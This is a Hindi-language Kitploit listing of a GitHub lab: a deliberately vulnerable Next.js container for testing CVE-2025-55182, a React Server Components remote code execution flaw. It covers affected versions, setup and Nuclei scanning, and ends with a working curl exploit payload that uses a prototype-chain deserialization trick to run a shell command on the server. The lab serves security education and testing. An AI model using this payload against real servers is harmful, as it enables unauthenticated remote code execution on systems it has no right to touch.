Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell-CVE-2025-55182-Testing-Environment — CVE-2025-55182 के लिए एक कंटेनरीकृत परीक्षण वातावरण, जो React Server Components में एक गंभीर (10.0 CVSS) रिमोट कोड निष्पादन भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/abcfabian/react2shell-cve-2025-55182-testing-environment
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubabcfabian/react2shell-cve-2025-55182-testing-environment

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell-CVE-2025-55182-Testing-Environment

CVE-2025-55182 के लिए एक कंटेनरीकृत परीक्षण वातावरण, जो React Server Components में एक गंभीर (10.0 CVSS) रिमोट कोड निष्पादन भेद्यता है।

रिपॉजिटरी देखें
129 महीने पहलेअभी तक समीक्षित नहीं

React2Shell (CVE-2025-55182) परीक्षण वातावरण

CVE-2025-55182 के लिए एक कंटेनरीकृत परीक्षण वातावरण, जो React सर्वर घटकों में एक गंभीर (10.0 CVSS) दूरस्थ कोड निष्पादन भेद्यता है।

⚠️ चेतावनी

यह वातावरण जानबूझकर असुरक्षित है और इसका उपयोग केवल इसके लिए किया जाना चाहिए:

  • सुरक्षा अनुसंधान और शिक्षा
  • पृथक वातावरण में पेनिट्रेशन परीक्षण
  • भेद्यता यांत्रिकी को समझना

न करें:

  • इसे उत्पादन में तैनात करें
  • इसे इंटरनेट पर उजागर करें
  • दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग करें

भेद्यता विवरण

  • CVE: CVE-2025-55182 (React), CVE-2025-66478 (Next.js)
  • गंभीरता: गंभीर (10.0)
  • प्रकार: अप्रमाणित दूरस्थ कोड निष्पादन
  • प्रभावित: Next.js 15.x/16.x ऐप राउटर में React सर्वर घटक
  • कमजोरी: CWE-502 (अविश्वसनीय डेटा का डिसीरियलाइज़ेशन)

प्रभावित संस्करण

React पैकेज:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js:

  • 15.0.0 - 15.0.4
  • 15.1.0 - 15.1.8
  • 15.2.0 - 15.2.5
  • 15.3.0 - 15.3.5
  • 15.4.0 - 15.4.7
  • 15.5.0 - 15.5.6
  • 16.0.0 - 16.0.6

पैच किए गए संस्करण

React: 19.0.1, 19.1.2, 19.2.1 Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

त्वरित आरंभ

Podman का उपयोग करना (macOS)

root@kitploit:~
# Build and start the vulnerable environment
podman compose up --build -d

# Check it's running
curl http://localhost:3000/api/status

# View logs
podman logs -f react2shell-vuln

# Stop
podman compose down

Docker Compose का उपयोग करना

root@kitploit:~
# Build and start the vulnerable environment
docker-compose up --build -d

# Access the application at http://localhost:3000

परियोजना संरचना

root@kitploit:~
.
├── README.md               # यह फ़ाइल
├── Dockerfile              # कंटेनर निर्माण निर्देश
├── Dockerfile.dev          # हॉट रीलोड के साथ विकास कंटेनर
├── docker-compose.yml      # Docker/Podman Compose कॉन्फ़िगरेशन
├── CVE-2025-55182.yaml     # Nuclei स्कैनर टेम्पलेट
├── scan.sh                 # सामान्य-उद्देश्य Nuclei स्कैनर स्क्रिप्ट
├── scan-results/           # स्कैन आउटपुट निर्देशिका
└── vulnerable-app/         # असुरक्षित Next.js एप्लिकेशन
    ├── package.json        # निर्भरताएँ (असुरक्षित संस्करण)
    ├── next.config.js      # Next.js कॉन्फ़िगरेशन
    ├── tsconfig.json       # TypeScript कॉन्फ़िगरेशन
    └── app/                # ऐप राउटर पेज और घटक
        ├── layout.tsx      # रूट लेआउट
        ├── page.tsx        # सर्वर घटकों के साथ मुख्य पेज
        ├── globals.css     # स्टाइल
        ├── actions.ts      # सर्वर एक्शन
        ├── api/status/     # स्थिति API एंडपॉइंट
        └── components/     # React घटक

भेद्यता के लिए स्कैनिंग

Nuclei टेम्पलेट डाउनलोड करें

यदि आपके पास टेम्पलेट नहीं है, तो इसे आधिकारिक nuclei-templates रिपॉजिटरी से डाउनलोड करें:

root@kitploit:~
curl -o CVE-2025-55182.yaml https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2025/CVE-2025-55182.yaml

स्कैनर स्क्रिप्ट का उपयोग करना

शामिल scan.sh एक सामान्य-उद्देश्य Nuclei कंटेनर स्कैनर है जो Docker और Podman दोनों के साथ काम करता है।

root@kitploit:~
# Scan the local vulnerable app
./scan.sh -u http://host.docker.internal:3000 -t CVE-2025-55182.yaml -v

# Scan any target
./scan.sh -u https://example.com -t CVE-2025-55182.yaml

# Scan with all Nuclei templates
./scan.sh -u https://example.com

# Scan multiple targets from a file
./scan.sh -l targets.txt -t CVE-2025-55182.yaml

# Filter by severity
./scan.sh -u https://example.com -s critical,high

# JSON output
./scan.sh -u https://example.com -t CVE-2025-55182.yaml -j

स्कैनर विकल्प

मैन्युअल Nuclei स्कैन (Podman)

root@kitploit:~
podman run --rm \
    -v "$(pwd)/CVE-2025-55182.yaml:/templates/CVE-2025-55182.yaml:ro" \
    docker.io/projectdiscovery/nuclei:latest \
    -t /templates/CVE-2025-55182.yaml \
    -u "http://host.docker.internal:3000" \
    -v

भेद्यता का परीक्षण

एक बार कंटेनर चल रहा हो:

  1. http://localhost:3000 पर एप्लिकेशन तक पहुँचें
  2. स्थिति API की जाँच करें: http://localhost:3000/api/status
  3. भेद्यता का पता लगाने के लिए स्कैनर चलाएँ
  4. एप्लिकेशन Next.js ऐप राउटर के माध्यम से React सर्वर घटकों का उपयोग करता है

नोट: भेद्यता में RSC प्रोटोकॉल में असुरक्षित डिसीरियलाइज़ेशन शामिल है। Nuclei टेम्पलेट इस विशिष्ट आक्रमण वेक्टर का परीक्षण करता है।

पैच किए गए संस्करण पर स्विच करना

पैच किए गए संस्करण का परीक्षण करने के लिए, vulnerable-app/package.json को संशोधित करें:

root@kitploit:~
{
  "dependencies": {
    "next": "15.5.7",
    "react": "^19.1.2",
    "react-dom": "^19.1.2"
  }
}

फिर पुनर्निर्माण करें:

root@kitploit:~
# Podman
podman compose down
podman compose up --build -d

# Docker
docker-compose down
docker-compose up --build

संदर्भ

  • React Security Advisory
  • Next.js Security Advisory
  • React Blog Post
  • react2shell.com
  • Nuclei Templates

अस्वीकरण

यह परीक्षण वातावरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। रखरखावकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग के लिए उत्तरदायी नहीं हैं। सुरक्षा भेद्यताओं का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

Curl शोषण उदाहरण

root@kitploit:~
curl -X POST http://localhost:3000 \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary" \
  -H "X-Nextjs-Request-Id: test123" \
  --data-binary $'------WebKitFormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\n{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\\"then\\":\\"$B1337\\"}",
  "_response": {
    "_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'id\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------WebKitFormBoundary--' \
  -i 2>&1 | grep -i "x-action-redirect"
टूल डाउनलोड करें
विकल्पविवरण
-u, --url <url>स्कैन करने के लिए एकल लक्ष्य URL
-l, --list <file>लक्ष्य URL की सूची वाली फ़ाइल
-t, --template <file>कस्टम टेम्पलेट फ़ाइल या निर्देशिका
-o, --output <dir>आउटपुट निर्देशिका (डिफ़ॉल्ट: ./scan-results)
-s, --severity <level>फ़िल्टर: info, low, medium, high, critical
-r, --rate-limit <n>प्रति सेकंड अधिकतम अनुरोध
-j, --jsonपरिणाम JSON प्रारूप में आउटपुट करें
-v, --verboseविस्तृत आउटपुट
-h, --helpसहायता संदेश दिखाएँ